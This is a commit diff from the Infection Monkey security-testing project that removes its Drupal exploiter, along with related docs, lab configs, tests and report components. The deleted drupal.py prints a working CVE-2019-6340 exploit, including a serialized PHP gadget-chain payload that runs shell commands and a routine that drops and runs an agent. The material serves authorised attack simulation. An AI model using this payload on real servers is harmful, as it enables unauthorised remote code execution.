p17860254
/
monkey
forked from p15670423/monkey
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity

Merge pull request #1876 from guardicore/1869-remove-drupal 

Remove Drupal exploiter
This commit is contained in:
Mike Salvatore 2022-04-10 09:45:24 -04:00
parent 727f19ecf6 533a1b7d98
commit 1f5bb7efaf
24 changed files with 10 additions and 364 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

1
CHANGELOG.md
View File

@ -55,6 +55,7 @@ Changelog](https://keepachangelog.com/en/1.0.0/).
- Log path config options. #1761
- "smb_service_name" option. #1741
- Struts2 exploiter. #1869
- Drupal exploiter. #1869
### Fixed
- A bug in network map page that caused delay of telemetry log loading. #1545

4
docs/content/development/adding-exploits.md
View File

@ -39,7 +39,7 @@ class MyNewExploiter(HostExploiter):
...
```
A good example of an exploiter class is the [`SSHExploiter`](https://github.com/guardicore/monkey/blob/develop/monkey/infection_monkey/exploit/sshexec.py). The [Drupal exploiter is a recently added web RCE exploit](https://github.com/guardicore/monkey/pull/808) that is a good reference as well.
A good example of an exploiter class is the [`SSHExploiter`](https://github.com/guardicore/monkey/blob/develop/monkey/infection_monkey/exploit/sshexec.py). The [Log4Shell exploiter is a recently added web RCE exploit](https://github.com/guardicore/monkey/pull/1670) that is a good reference as well.
### Modify the Monkey Island
@ -83,7 +83,7 @@ A good example of an exploiter class is the [`SSHExploiter`](https://github.com/
"default": [
"SmbExploiter",
...
"DrupalExploiter",
"Log4ShellExploiter",
"MyNewExploiter", <=================================
],
}

35
docs/content/reference/exploiters/Drupal.md
View File

@ -1,35 +0,0 @@
---
title: "Drupal"
date: 2020-09-01T08:42:46+03:00
draft: false
tags: ["exploit", "linux", "windows"]
---
The Drupal exploiter exploits [CVE-2019-6340](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6340)
on a vulnerable Drupal server.
### Description
Some field types do not properly sanitize data from non-form sources in certain versions
of Drupal server.
This can lead to arbitrary PHP code execution in some cases.
### Affected Versions
* Drupal 8.5.x (before 8.5.11) and Drupal 8.6.x (before 8.6.10).
One of the following conditions must hold:
* The site has the Drupal 8 core RESTful Web Services (rest) module enabled and allows PATCH
or POST requests; OR
* The site has another web services module enabled, like JSON:API in
Drupal 8, or Services or RESTful Web Services in Drupal 7.
### Notes
* The Infection Monkey exploiter implementation is based on an open-source
[Python implementation](https://gist.github.com/leonjza/d0ab053be9b06fa020b66f00358e3d88/f9f6a5bb6605745e292bee3a4079f261d891738a)
of the exploit by @leonjza.
* For the full attack to work, more than one vulnerable URL is required.

18
envs/monkey_zoo/blackbox/config_templates/drupal.py
View File

@ -1,18 +0,0 @@
from copy import copy
from envs.monkey_zoo.blackbox.config_templates.base_template import BaseTemplate
from envs.monkey_zoo.blackbox.config_templates.config_template import ConfigTemplate
class Drupal(ConfigTemplate):
config_values = copy(BaseTemplate.config_values)
config_values.update(
{
"internal.classes.finger_classes": ["HTTPFinger"],
"basic.exploiters.exploiter_classes": ["DrupalExploiter"],
"basic_network.scope.subnet_scan_list": ["10.2.2.28"],
"internal.network.tcp_scanner.HTTP_PORTS": [80],
"internal.network.tcp_scanner.tcp_target_ports": [],
}
)

1
envs/monkey_zoo/blackbox/gcp_test_machine_list.py
View File

@ -14,7 +14,6 @@ GCP_TEST_MACHINE_LIST = {
"weblogic-18",
"weblogic-19",
"zerologon-25",
"drupal-28",
],
"europe-west1-b": [
"powershell-3-45",

5
envs/monkey_zoo/blackbox/test_blackbox.py
View File

@ -8,7 +8,6 @@ from typing_extensions import Type
from envs.monkey_zoo.blackbox.analyzers.communication_analyzer import CommunicationAnalyzer
from envs.monkey_zoo.blackbox.analyzers.zerologon_analyzer import ZerologonAnalyzer
from envs.monkey_zoo.blackbox.config_templates.config_template import ConfigTemplate
from envs.monkey_zoo.blackbox.config_templates.drupal import Drupal
from envs.monkey_zoo.blackbox.config_templates.hadoop import Hadoop
from envs.monkey_zoo.blackbox.config_templates.log4j_logstash import Log4jLogstash
from envs.monkey_zoo.blackbox.config_templates.log4j_solr import Log4jSolr
@ -185,10 +184,6 @@ class TestMonkeyBlackbox:
def test_smb_pth(self, island_client):
TestMonkeyBlackbox.run_exploitation_test(island_client, SmbPth, "SMB_PTH")
@pytest.mark.skip(reason="Drupal exploiter is deprecated")
def test_drupal_exploiter(self, island_client):
TestMonkeyBlackbox.run_exploitation_test(island_client, Drupal, "Drupal_exploiter")
@pytest.mark.skip(reason="Weblogic exploiter is deprecated")
def test_weblogic_exploiter(self, island_client):
TestMonkeyBlackbox.run_exploitation_test(island_client, Weblogic, "Weblogic_exploiter")

2
envs/monkey_zoo/blackbox/utils/config_generation_script.py
View File

@ -3,7 +3,6 @@ import pathlib
from typing import Type
from envs.monkey_zoo.blackbox.config_templates.config_template import ConfigTemplate
from envs.monkey_zoo.blackbox.config_templates.drupal import Drupal
from envs.monkey_zoo.blackbox.config_templates.hadoop import Hadoop
from envs.monkey_zoo.blackbox.config_templates.log4j_logstash import Log4jLogstash
from envs.monkey_zoo.blackbox.config_templates.log4j_solr import Log4jSolr
@ -49,7 +48,6 @@ CONFIG_TEMPLATES = [
WmiMimikatz,
WmiPth,
Zerologon,
Drupal,
Log4jLogstash,
Log4jTomcat,
Log4jSolr,

4
envs/monkey_zoo/terraform/images.tf
View File

@ -103,10 +103,6 @@ data "google_compute_image" "zerologon-25" {
name = "zerologon-25"
project = local.monkeyzoo_project
}
data "google_compute_image" "drupal-28" {
name = "drupal-28"
project = local.monkeyzoo_project
}
data "google_compute_image" "island-linux-250" {
name = "island-linux-250"
project = local.monkeyzoo_project

15
envs/monkey_zoo/terraform/monkey_zoo.tf
View File

@ -495,21 +495,6 @@ resource "google_compute_instance_from_template" "zerologon-25" {
}
}
resource "google_compute_instance_from_template" "drupal-28" {
name = "${local.resource_prefix}drupal-28"
source_instance_template = local.default_windows
boot_disk{
initialize_params {
image = data.google_compute_image.drupal-28.self_link
}
auto_delete = true
}
network_interface {
subnetwork="${local.resource_prefix}monkeyzoo-main"
network_ip="10.2.2.28"
}
}
resource "google_compute_instance_from_template" "island-linux-250" {
name = "${local.resource_prefix}island-linux-250"
machine_type = "n1-standard-2"

9
monkey/common/network/network_utils.py
View File

@ -1,13 +1,4 @@
import re
from typing import Optional, Tuple
from urllib.parse import urlparse
def remove_port(url):
parsed = urlparse(url)
with_port = f"{parsed.scheme}://{parsed.netloc}"
without_port = re.sub(":[0-9]+(?=$|/)", "", with_port)
return without_port
def address_to_ip_port(address: str) -> Tuple[str, Optional[str]]:

197
monkey/infection_monkey/exploit/drupal.py
View File

@ -1,197 +0,0 @@
"""
Remote Code Execution on Drupal server - CVE-2019-6340
Implementation is based on:
https://gist.github.com/leonjza/d0ab053be9b06fa020b66f00358e3d88
/f9f6a5bb6605745e292bee3a4079f261d891738a.
"""
import logging
from urllib.parse import urljoin
import requests
from common.common_consts.timeouts import LONG_REQUEST_TIMEOUT, MEDIUM_REQUEST_TIMEOUT
from common.network.network_utils import remove_port
from infection_monkey.exploit.web_rce import WebRCE
from infection_monkey.model import ID_STRING
logger = logging.getLogger(__name__)
class DrupalExploiter(WebRCE):
_EXPLOITED_SERVICE = "Drupal Server"
def __init__(self, host):
super(DrupalExploiter, self).__init__(host)
def get_exploit_config(self):
"""
We override this function because the exploits requires a special extension in the URL,
"node",
e.g. an exploited URL would be http://172.1.2.3:<port>/node/3.
:return: the Drupal exploit config
"""
exploit_config = super(DrupalExploiter, self).get_exploit_config()
exploit_config["url_extensions"] = [
"node/", # In Linux, no path is added
"drupal/node/",
] # However, Bitnami installations are under /drupal
exploit_config["dropper"] = True
return exploit_config
def add_vulnerable_urls(self, potential_urls, stop_checking=False):
"""
We need a specific implementation of this function in order to add the URLs *with the
node IDs*.
We therefore check, for every potential URL, all possible node IDs.
:param potential_urls: Potentially-vulnerable URLs
:param stop_checking: Stop if one vulnerable URL is found
:return: None (in-place addition)
"""
for url in potential_urls:
try:
node_ids = find_exploitbale_article_ids(url)
if node_ids is None:
logger.info("Could not find a Drupal node to attack")
continue
for node_id in node_ids:
node_url = urljoin(url, str(node_id))
if self.check_if_exploitable(node_url):
self.add_vuln_url(
url
) # This is for report. Should be refactored in the future
self.vulnerable_urls.append(node_url)
if stop_checking:
break
except Exception as e: # We still don't know which errors to expect
logger.error(f"url {url} failed in exploitability check: {e}")
if not self.vulnerable_urls:
logger.info("No vulnerable urls found")
def check_if_exploitable(self, url):
"""
Check if a certain URL is exploitable.
We use this specific implementation (and not simply run self.exploit) because this
function does not "waste"
a vulnerable URL. Namely, we're not actually exploiting, merely checking using a heuristic.
:param url: Drupal's URL and port
:return: Vulnerable URL if exploitable, otherwise False
"""
payload = build_exploitability_check_payload(url)
response = requests.get( # noqa: DUO123
f"{url}?_format=hal_json",
json=payload,
headers={"Content-Type": "application/hal+json"},
verify=False,
timeout=MEDIUM_REQUEST_TIMEOUT,
)
if is_response_cached(response):
logger.info(f"Checking if node {url} is vuln returned cache HIT, ignoring")
return False
return "INVALID_VALUE does not correspond to an entity on this site" in response.text
def exploit(self, url, command):
# pad a easy search replace output:
cmd = f"echo {ID_STRING} && {command}"
base = remove_port(url)
payload = build_cmd_execution_payload(base, cmd)
r = requests.get( # noqa: DUO123
f"{url}?_format=hal_json",
json=payload,
headers={"Content-Type": "application/hal+json"},
verify=False,
timeout=LONG_REQUEST_TIMEOUT,
)
if is_response_cached(r):
logger.info(f"Exploiting {url} returned cache HIT, may have failed")
if ID_STRING not in r.text:
logger.warning("Command execution _may_ have failed")
result = r.text.split(ID_STRING)[-1]
return result
def get_target_url(self):
"""
We're overriding this method such that every time self.exploit is invoked, we use a fresh
vulnerable URL.
Reusing the same URL eliminates its exploitability because of caching reasons :)
:return: vulnerable URL to exploit
"""
return self.vulnerable_urls.pop()
def are_vulnerable_urls_sufficient(self):
"""
For the Drupal exploit, 5 distinct URLs are needed to perform the full attack.
:return: Whether the list of vulnerable URLs has at least 5 elements.
"""
# We need 5 URLs for a "full-chain": check remote files, check architecture, drop monkey,
# chmod it and run it.
num_urls_needed_for_full_exploit = 5
num_available_urls = len(self.vulnerable_urls)
result = num_available_urls >= num_urls_needed_for_full_exploit
if not result:
logger.info(
f"{num_urls_needed_for_full_exploit} URLs are needed to fully exploit a "
f"Drupal server "
f"but only {num_available_urls} found"
)
return result
def is_response_cached(r: requests.Response) -> bool:
"""Check if a response had the cache header."""
return "X-Drupal-Cache" in r.headers and r.headers["X-Drupal-Cache"] == "HIT"
def find_exploitbale_article_ids(base_url: str, lower: int = 1, upper: int = 100) -> set:
"""Find target articles that do not 404 and are not cached"""
articles = set()
while lower < upper:
node_url = urljoin(base_url, str(lower))
response = requests.get( # noqa: DUO123
node_url, verify=False, timeout=LONG_REQUEST_TIMEOUT
)
if response.status_code == 200:
if is_response_cached(response):
logger.info(f"Found a cached article at: {node_url}, skipping")
else:
articles.add(lower)
lower += 1
return articles
def build_exploitability_check_payload(url):
payload = {
"_links": {"type": {"href": f"{urljoin(url, '/rest/type/node/INVALID_VALUE')}"}},
"type": {"target_id": "article"},
"title": {"value": "My Article"},
"body": {"value": ""},
}
return payload
def build_cmd_execution_payload(base, cmd):
payload = {
"link": [
{
"value": "link",
"options": 'O:24:"GuzzleHttp\\Psr7\\FnStream":2:{s:33:"\u0000'
'GuzzleHttp\\Psr7\\FnStream\u0000methods";a:1:{s:5:"'
'close";a:2:{i:0;O:23:"GuzzleHttp\\HandlerStack":3:'
'{s:32:"\u0000GuzzleHttp\\HandlerStack\u0000handler";'
's:|size|:"|command|";s:30:"\u0000GuzzleHttp\\HandlerStack\u0000'
'stack";a:1:{i:0;a:1:{i:0;s:6:"system";}}s:31:"\u0000'
'GuzzleHttp\\HandlerStack\u0000cached";b:0;}i:1;s:7:"'
'resolve";}}s:9:"_fn_close";a:2:{i:0;r:4;i:1;s:7:"resolve";}}'
"".replace("|size|", str(len(cmd))).replace("|command|", cmd),
}
],
"_links": {"type": {"href": f"{urljoin(base, '/rest/type/shortcut/default')}"}},
}
return payload

16
monkey/infection_monkey/exploit/web_rce.py
View File

@ -85,9 +85,6 @@ class WebRCE(HostExploiter):
)
self.add_vulnerable_urls(potential_urls, exploit_config["stop_checking_urls"])
if not self.are_vulnerable_urls_sufficient():
return False
# Upload the right monkey to target
data = self.upload_monkey(self.get_target_url(), exploit_config["upload_commands"])
@ -424,18 +421,7 @@ class WebRCE(HostExploiter):
"""
This method allows "configuring" the way in which a vulnerable URL is picked.
If the same URL should be used - always return the first.
Otherwise - implement your own (e.g. Drupal must use a new URI each time).
Otherwise - implement your own.
:return: a vulnerable URL
"""
return self.vulnerable_urls[0]
def are_vulnerable_urls_sufficient(self):
"""
Determine whether the number of vulnerable URLs is sufficient in order to perform the
full attack.
Often, a single URL will suffice. However, in some cases (e.g. the Drupal exploit) a
vulnerable URL is for
single use, thus we need a couple of them.
:return: Whether or not a full attack can be performed using the available vulnerable URLs.
"""
return len(self.vulnerable_urls) > 0

1
monkey/monkey_island/cc/services/config_schema/basic.py
View File

@ -21,7 +21,6 @@ BASIC = {
"WebLogicExploiter",
"HadoopExploiter",
"MSSQLExploiter",
"DrupalExploiter",
"PowerShellExploiter",
],
}

9
monkey/monkey_island/cc/services/config_schema/definitions/exploiter_classes.py
View File

@ -72,15 +72,6 @@ EXPLOITER_CLASSES = {
"https://github.com/vulhub/vulhub/tree/master/hadoop/unauthorized-yarn.",
"link": "https://www.guardicore.com/infectionmonkey/docs/reference/exploiters/hadoop/",
},
{
"type": "string",
"enum": ["DrupalExploiter"],
"title": "Drupal Exploiter",
"safe": True,
"info": "Exploits a remote command execution vulnerability in a Drupal server,"
"for which certain modules (such as RESTful Web Services) are enabled.",
"link": "https://www.guardicore.com/infectionmonkey/docs/reference/exploiters/drupal/",
},
{
"type": "string",
"enum": ["ZerologonExploiter"],

1
monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py
View File

@ -33,7 +33,6 @@ class ExploiterDescriptorEnum(Enum):
)
HADOOP = ExploiterDescriptor("HadoopExploiter", "Hadoop/Yarn Exploiter", ExploitProcessor)
MSSQL = ExploiterDescriptor("MSSQLExploiter", "MSSQL Exploiter", ExploitProcessor)
DRUPAL = ExploiterDescriptor("DrupalExploiter", "Drupal Server Exploiter", ExploitProcessor)
ZEROLOGON = ExploiterDescriptor(
"ZerologonExploiter", "Zerologon Exploiter", ZerologonExploitProcessor
)

6
monkey/monkey_island/cc/ui/src/components/report-components/SecurityReport.js
View File

@ -23,7 +23,6 @@ import {smbPasswordReport, smbPthReport} from './security/issues/SmbIssue';
import {webLogicIssueOverview, webLogicIssueReport} from './security/issues/WebLogicIssue';
import {hadoopIssueOverview, hadoopIssueReport} from './security/issues/HadoopIssue';
import {mssqlIssueOverview, mssqlIssueReport} from './security/issues/MssqlIssue';
import {drupalIssueOverview, drupalIssueReport} from './security/issues/DrupalIssue';
import {wmiPasswordIssueReport, wmiPthIssueReport} from './security/issues/WmiIssue';
import {sshKeysReport, shhIssueReport, sshIssueOverview} from './security/issues/SshIssue';
import {log4shellIssueOverview, log4shellIssueReport} from './security/issues/Log4ShellIssue';
@ -92,11 +91,6 @@ class ReportPageComponent extends AuthComponent {
[this.issueContentTypes.REPORT]: mssqlIssueReport,
[this.issueContentTypes.TYPE]: this.issueTypes.DANGER
},
'DrupalExploiter': {
[this.issueContentTypes.OVERVIEW]: drupalIssueOverview,
[this.issueContentTypes.REPORT]: drupalIssueReport,
[this.issueContentTypes.TYPE]: this.issueTypes.DANGER
},
'WmiExploiter': {
[this.issueContentTypes.REPORT]: {
[this.credentialTypes.PASSWORD]: wmiPasswordIssueReport,

24
monkey/monkey_island/cc/ui/src/components/report-components/security/issues/DrupalIssue.js
View File

@ -1,24 +0,0 @@
import React from 'react';
import CollapsibleWellComponent from '../CollapsibleWell';
export function drupalIssueOverview() {
return (<li>Drupal server/s are vulnerable to <a
href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6340">CVE-2019-6340</a>.</li>)
}
export function drupalIssueReport(issue) {
return (
<>
Upgrade Drupal server to versions 8.5.11, 8.6.10, or later.
<CollapsibleWellComponent>
Drupal server at <span className="badge badge-primary">{issue.machine}</span> (<span
className="badge badge-info" style={{margin: '2px'}}>{issue.ip_address}</span>) is vulnerable to <span
className="badge badge-danger">remote command execution</span> attack.
<br/>
The attack was made possible because the server is using an old version of Drupal, for which REST API is
enabled. For possible workarounds, fixes and more info read
<a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6340">here</a>.
</CollapsibleWellComponent>
</>
);
}

1
monkey/tests/data_for_tests/monkey_configs/automated_master_config.json
View File

@ -54,7 +54,6 @@
{"name": "WmiExploiter", "supported_os": ["windows"], "options": {}}
],
"vulnerability": [
{"name": "DrupalExploiter", "supported_os": ["linux", "windows"], "options": {}},
{"name": "HadoopExploiter", "supported_os": ["linux", "windows"], "options": {}},
{"name": "ShellShockExploiter", "supported_os": ["linux"], "options": {}},
{"name": "WebLogicExploiter", "supported_os": ["linux", "windows"], "options": {}},

1
monkey/tests/data_for_tests/monkey_configs/flat_config.json
View File

@ -53,7 +53,6 @@
"WebLogicExploiter",
"HadoopExploiter",
"MSSQLExploiter",
"DrupalExploiter",
"PowerShellExploiter",
"Log4ShellExploiter"
],

3
monkey/tests/data_for_tests/monkey_configs/monkey_config_standard.json
View File

@ -7,8 +7,7 @@
"SSHExploiter",
"WebLogicExploiter",
"HadoopExploiter",
"MSSQLExploiter",
"DrupalExploiter"
"MSSQLExploiter"
]
},
"credentials": {

11
monkey/tests/unit_tests/common/network/test_network_utils.py
View File

@ -1,13 +1,4 @@
from unittest import TestCase
from common.network.network_utils import address_to_ip_port, remove_port
class TestNetworkUtils(TestCase):
def test_remove_port_from_url(self):
assert remove_port("https://google.com:80") == "https://google.com"
assert remove_port("https://8.8.8.8:65336") == "https://8.8.8.8"
assert remove_port("ftp://ftpserver.com:21/hello/world") == "ftp://ftpserver.com"
from common.network.network_utils import address_to_ip_port
def test_address_to_ip_port():

8
monkey/tests/unit_tests/monkey_island/cc/services/reporting/exploitations/test_monkey_exploitation.py
View File

@ -94,9 +94,9 @@ NODE_DICT = {
"exploits": [
{
"exploitation_result": True,
"exploiter": "DrupalExploiter",
"exploiter": "Log4ShellExploiter",
"info": {
"display_name": "Drupal Server",
"display_name": "Log4j",
"started": datetime.datetime(2021, 2, 19, 9, 0, 14, 950000),
"finished": datetime.datetime(2021, 2, 19, 9, 0, 14, 950000),
"vulnerable_urls": [],
@ -135,12 +135,12 @@ NODE_DICT_FAILED_EXPLOITS["exploits"][1]["exploitation_result"] = False
def test_get_exploits_used_on_node__2_exploits():
exploits = get_exploits_used_on_node(NODE_DICT)
assert sorted(exploits) == sorted(["Zerologon Exploiter", "Drupal Server Exploiter"])
assert sorted(exploits) == sorted(["Zerologon Exploiter", "Log4Shell Exploiter"])
def test_get_exploits_used_on_node__duplicate_exploits():
exploits = get_exploits_used_on_node(NODE_DICT_DUPLICATE_EXPLOITS)
assert exploits == ["Drupal Server Exploiter"]
assert exploits == ["Log4Shell Exploiter"]
def test_get_exploits_used_on_node__failed():

1
monkey/tests/unit_tests/monkey_island/cc/services/test_config.py
View File

@ -199,7 +199,6 @@ def test_format_config_for_agent__exploiters(flat_monkey_config):
},
],
"vulnerability": [
{"name": "DrupalExploiter", "supported_os": [], "options": {}},
{"name": "HadoopExploiter", "supported_os": ["linux", "windows"], "options": {}},
{"name": "Log4ShellExploiter", "supported_os": ["linux", "windows"], "options": {}},
{"name": "WebLogicExploiter", "supported_os": [], "options": {}},

1
vulture_allowlist.py
View File

@ -60,7 +60,6 @@ WEBLOGIC # unused variable (monkey/monkey_island/cc/services/reporting/issue_pr
HADOOP # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:43)
MSSQL # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:44)
VSFTPD # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:45)
DRUPAL # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:48)
POWERSHELL # (\monkey\monkey_island\cc\services\reporting\issue_processing\exploit_processing\exploiter_descriptor_enum.py:52)
ExploiterDescriptorEnum.LOG4SHELL
PbaResults # unused class (monkey/monkey_island/cc/models/pba_results.py:4)